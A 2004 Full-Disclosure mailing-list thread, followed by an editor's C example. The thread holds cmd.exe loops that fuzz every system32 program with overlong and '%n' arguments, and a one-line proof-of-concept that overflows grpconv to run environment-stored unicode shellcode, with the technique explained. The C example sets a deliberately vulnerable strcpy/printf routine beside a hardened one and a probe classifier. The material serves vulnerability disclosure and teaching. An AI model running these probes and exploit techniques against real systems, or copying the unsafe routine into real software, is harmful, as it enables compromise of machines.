
Re: [Full-Disclosure] Test your windows OS



Anybody wanna try if this shows a popup? It's 1 line; if it wraps, put it back 
together:
-------------------------------
set 
!!!!!!=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
 && %SystemRoot%\system32\grpconv 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA!
 
AAAAAAAAAAAAAAAAAAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZ^N^A^N^A-------------------------------
Let me know if it works (off-list) and what system you're using. I developed it 
on win2ken sp4.
Tech stuff:
The string "^N^A^N^A" at the end should be typed "ctrl+N, ctrl+A, ctrl+N, 
ctrl+A". It works by installing a unicode shellcode in the environment string 
"!!!!!!" at 0x00010000. This should alphabetically be the first string, so the 
shellcode should be at 0x0001000e. I overwrite a return address 
(^N^A=0x0001000e). The unicode shellcode needs to know its own base address; 
that's why there's "^N^A" twice: the first one is used to return, the second 
one is popped off by the shellcode to get the base address.

Cheers,
SkyLined

----- Original Message ----- 
From: "Berend-Jan Wever" <skylined@xxxxxxxxxxxxxxx>
To: <full-disclosure@xxxxxxxxxxxxxxxx>
Sent: Monday, October 04, 2004 17:39
Subject: [Full-Disclosure] Test your windows OS


> Hi all,
> 
> Wanna do a quick test to see if the programmers that wrote your windows 
> operating system have any clue as to what they're doing? Run these commands 
> from cmd.exe in the system32 directory:
> 
> for %i in (*.exe) do start %i %n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n
> for %i in (*.exe) do start %i AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.... 
> (type as much "A"-s as cmd.exe allows on one line.)
> 
> Each command will execute every program in your system32 directory; most of 
> them will either ignore the parameter or report an error because the 
> parameter doesn't make sense... But on my win2k system I found 6 programs 
> vulnerable to these very simple format string and BoF tests.... grpconv even 
> gives EIP 0x00410041, can it be any easier?
> 
> These are not vulnerabilities in themselves: you cannot gain access or elevate 
> privileges, but I just wanted to let you know that these programmers did a 
> sloppy job.
> 
> Cheers,
> SkyLined
> 
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
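The two probe classes in this thread (an overlong argument and a run of `%n` directives) hit two distinct defects in an argument-handling routine: an unbounded copy into a fixed stack buffer, and user input passed to printf as the format string. As an added example, not code from the post or from any Windows component, here is the vulnerable C pattern beside the bounded, literal-format form a defender would accept, plus a small pre-flight classifier that flags both probe classes before an argument is handed to a program. `NAME_MAX`, the function names and the sample inputs are constructed for this example.

```c
#include <stdio.h>
#include <string.h>

/* Editor's example, not code from the thread. NAME_MAX and the function
 * names are constructed for illustration. */
#define NAME_MAX 64

/* The pattern the probes in the thread look for. strcpy() does not know
 * the size of name[], so an argument longer than 63 bytes overwrites the
 * stack (the "AAAA..." test). Passing the argument itself as the format
 * string would let "%n" directives write to memory (the "%n%n%n" test);
 * that call is left commented out so the file compiles cleanly. This
 * function is never called here; it is kept only for comparison. */
static void show_name_unsafe(const char *arg)
{
    char name[NAME_MAX];
    strcpy(name, arg);        /* no length check: stack buffer overflow */
    /* printf(name); */       /* attacker-controlled format string */
    puts(name);
}

/* Hardened form: bounded copy with a literal format string. Returns 1 when
 * the input had to be truncated so the caller can reject it instead of
 * silently accepting a clipped value. */
static int show_name_safe(const char *arg, char *out, size_t outlen)
{
    if (outlen == 0)
        return 1;
    int n = snprintf(out, outlen, "%s", arg);   /* "%s" is fixed; arg is data */
    return n < 0 || (size_t)n >= outlen;
}

/* Pre-flight check for an argument about to be handed to an external
 * program. Bit 0: longer than the caller's limit (BoF probe). Bit 1:
 * contains '%' (format-directive probe). 0 means neither class matched. */
static int classify_arg(const char *arg, size_t limit)
{
    int flags = 0;
    if (strlen(arg) > limit)
        flags |= 1;
    if (strchr(arg, '%') != NULL)
        flags |= 2;
    return flags;
}

int main(void)
{
    /* Constructed sample inputs mirroring the thread's probes. */
    char longa[300];
    memset(longa, 'A', sizeof longa - 1);
    longa[sizeof longa - 1] = '\0';
    const char *probes[] = { "grpconv", "%n%n%n%n%n%n%n%n", longa };

    char out[NAME_MAX];
    for (size_t i = 0; i < sizeof probes / sizeof probes[0]; i++) {
        int flags = classify_arg(probes[i], NAME_MAX - 1);
        int truncated = show_name_safe(probes[i], out, sizeof out);
        printf("flags=%d truncated=%d out=%.20s%s\n",
               flags, truncated, out, strlen(out) > 20 ? "..." : "");
    }
    (void)show_name_unsafe;   /* referenced only so the comparison stays in the file */
    return 0;
}
```

The classifier is deliberately coarse: it is a test-time filter for the two probe shapes the thread uses, not a substitute for the bounded copy and literal format in `show_name_safe`, which are what actually remove the defects.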